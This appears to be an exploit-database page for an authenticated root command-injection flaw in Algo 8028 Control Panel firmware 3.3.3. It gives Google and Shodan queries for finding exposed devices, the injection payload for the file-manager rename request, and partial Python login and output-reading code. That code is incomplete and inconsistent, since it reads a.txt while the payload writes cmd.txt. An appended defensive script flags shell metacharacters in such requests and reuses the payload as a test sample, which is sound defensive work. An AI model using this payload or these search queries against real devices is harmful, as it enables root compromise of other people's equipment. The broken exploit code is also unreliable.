Exploit / Vulnerability Discovered: 2022-06-14
Type: remote
Platform: hardware
This exploit / vulnerability, Algo 8028 Control Panel - Remote Code Execution (RCE) (Authenticated), is for educational purposes only; if you use it, you do so at your own risk!
# Exploit Title: Algo 8028 Control Panel - Remote Code Execution (RCE) (Authenticated)
# Google Dork: intitle:"Algo 8028 Control Panel"
# Shodan: title:"Algo 8028 Control Panel"
# Date: 2022-06-07
# Exploit Author: Filip Carlsson
# Vendor Homepage: https://www.algosolutions.com/
# Software Link: https://www.algosolutions.com/firmware-downloads/8028-firmware-selection/
# Version: 3.3.3
# Tested on: Version 3.3.3
# CVE : N/A
# Exploit:
# Due to bad sanitization in http://<IP:PORT>/control/fm-data.lua you can do command injection as root
# Request: POST
# Formdata:
# action: rename
# source: /a";echo $(id) 2>&1 > /opt/algo/web/root/cmd.txt;"
# target: /
import requests

cookie = None  # session cookie, set by login()


def login(host, password):
    url = f"http://{host}/index.lua"
    data = {"pwd": password}
    res = requests.post(url, data=data)
    # check if html contains "Invalid Password"
    if "Invalid Password" in res.text:
        print("Invalid password")
        return False
    else:
        # save cookie
        global cookie
        cookie = res.cookies
        print("Successfully logged in\n")
        return True


def read_output(host):
    # get http://host/a.txt
    url = f"http://{host}/a.txt"
    res = requests.get(url)
    # if "404 Not Found" in text then command was not executed
    if "404 Not Found" in res.text:
        print("Command was not executed (404)")
    else:
        print(res.text)
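
A defensive counterpart to the form data quoted in the header comments, added here as an example and not part of the original exploit or of the vendor's firmware: a check that a reverse proxy or log-review script could run on POST bodies sent to /control/fm-data.lua. The function name, the metacharacter list and the first sample's file names are assumptions.

```python
from urllib.parse import parse_qs, urlencode

# Characters a POSIX shell interprets; none are needed in a file-manager path.
SHELL_META = set('"\'`$;|&<>\\\n\r')
PATH_FIELDS = ("source", "target")


def inspect_fm_request(path, body):
    """Return (field, reason) findings for one POST to /control/fm-data.lua."""
    if path.split("?", 1)[0] != "/control/fm-data.lua":
        return []
    form = parse_qs(body, keep_blank_values=True)
    findings = []
    for field in PATH_FIELDS:
        for value in form.get(field, []):
            bad = "".join(sorted(SHELL_META & set(value)))
            if bad:
                findings.append((field, f"shell metacharacters: {bad}"))
            elif not value.startswith("/"):
                findings.append((field, "not an absolute path"))
            elif ".." in value.split("/"):
                findings.append((field, "parent-directory segment"))
    return findings


# Constructed sample requests (request path, url-encoded form body).
# The first uses hypothetical file names; the second carries the form
# data quoted in the header comments of the exploit.
SAMPLES = [
    ("/control/fm-data.lua", urlencode(
        {"action": "rename", "source": "/old.wav", "target": "/new.wav"})),
    ("/control/fm-data.lua", urlencode(
        {"action": "rename", "target": "/",
         "source": '/a";echo $(id) 2>&1 > /opt/algo/web/root/cmd.txt;"'})),
    ("/index.lua", urlencode({"pwd": "example"})),
]

if __name__ == "__main__":
    for path, body in SAMPLES:
        print(path, inspect_fm_request(path, body) or "ok")
```
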